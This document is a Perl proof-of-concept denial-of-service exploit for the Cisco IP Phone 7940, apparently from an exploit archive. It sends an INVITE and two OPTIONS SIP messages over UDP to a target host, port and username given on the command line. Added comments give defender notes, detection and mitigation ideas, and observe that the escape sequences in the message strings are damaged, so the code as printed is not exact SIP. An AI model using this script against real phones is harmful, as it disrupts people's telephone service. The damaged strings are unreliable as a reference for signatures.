# Title : Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit
# Published : 2007-08-21
# Author : MADYNES
#!/usr/bin/perl
# Proof-of-concept script: sends three SIP requests over UDP, one second
# apart, to the host and port given on the command line. Per the page title
# the affected device is a Cisco IP Phone 7940 and the effect is a denial of
# service; the page itself does not state the root cause.
#
# Arguments: <dst> destination host, <port> UDP port, <username> the user
# part placed in the Request-URI and To header.
#
# Defender notes:
#  - The sequence is INVITE (CSeq 10), OPTIONS (CSeq 11), OPTIONS (CSeq 12),
#    all with the same Call-ID (et@192.168.1.2) and the same From identity
#    (gasparin@192.168.1.2). Those addresses are hard-coded in the script and
#    are unrelated to the sender's real address.
#  - The INVITE already carries a To tag (tag=00), which a dialog-creating
#    INVITE normally does not; the two OPTIONS carry none. Presumably this
#    inconsistent dialog state is what the handset mishandles -- TODO confirm
#    against the vendor advisory.
#  - Detection idea: SIP over UDP arriving at a handset from a host other
#    than its call-control server, reusing one Call-ID across INVITE and
#    OPTIONS within a few seconds.
#  - Mitigation idea: permit SIP signalling to handsets only from the
#    call-control server / SIP proxy, and follow the vendor's firmware
#    guidance for this model.
#
# NOTE(review): the `rn` and `t` runs inside the message strings look like
# line-ending and tab escapes damaged by page extraction; as printed the
# strings are not well-formed SIP, so do not treat them as an exact wire
# capture when writing signatures.
# NOTE(review): no `use strict` / `use warnings`; all variables are package
# globals.
use IO::Socket::INET;
# Requires all three arguments. The test is on truthiness, so a username of
# "0" is rejected as well.
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
# UDP socket bound to the destination given by <dst>:<port>. The constructor
# result is not checked, so a failure only shows up at the first send().
# NOTE(review): mixes indirect-object `new` with `->new`; the conventional
# form is IO::Socket::INET->new(...).
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
# Message 1: INVITE, branch=00, From tag=00, To tag=00, CSeq 10, empty body.
$msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDPt192.168.1.2;rport;branch=00rnFrom: <sip:gasparin@192.168.1.2>;tag=00rnTo: <sip:$ARGV[2]@$ARGV[0]>;tag=00rnCall-ID: et@192.168.1.2rnCSeq: 10 INVITErnContent-Length: 0rnrn";;
$socket->send($msg);
# One-second gap between messages; send() return values are not checked.
sleep(1);
# Message 2: OPTIONS on the same Call-ID, branch=01, From tag=01, no To tag,
# CSeq 11.
$msg ="OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01rnFrom: <sip:gasparin@192.168.1.2>;tag=01rnTo: <sip:$ARGV[2]@$ARGV[0]>rnCall-ID: et@192.168.1.2rnCSeq: 11 OPTIONSrnContent-Length: 0rnrn";
$socket->send($msg);
sleep(1);
# Message 3: second OPTIONS on the same Call-ID, branch=02, From tag=02,
# no To tag, CSeq 12.
$msg ="OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02rnFrom: <sip:gasparin@192.168.1.2>;tag=02rnTo: <sip:$ARGV[2]@$ARGV[0]>rnCall-ID: et@192.168.1.2rnCSeq: 12 OPTIONSrnContent-Length: 0rnrn";
$socket->send($msg);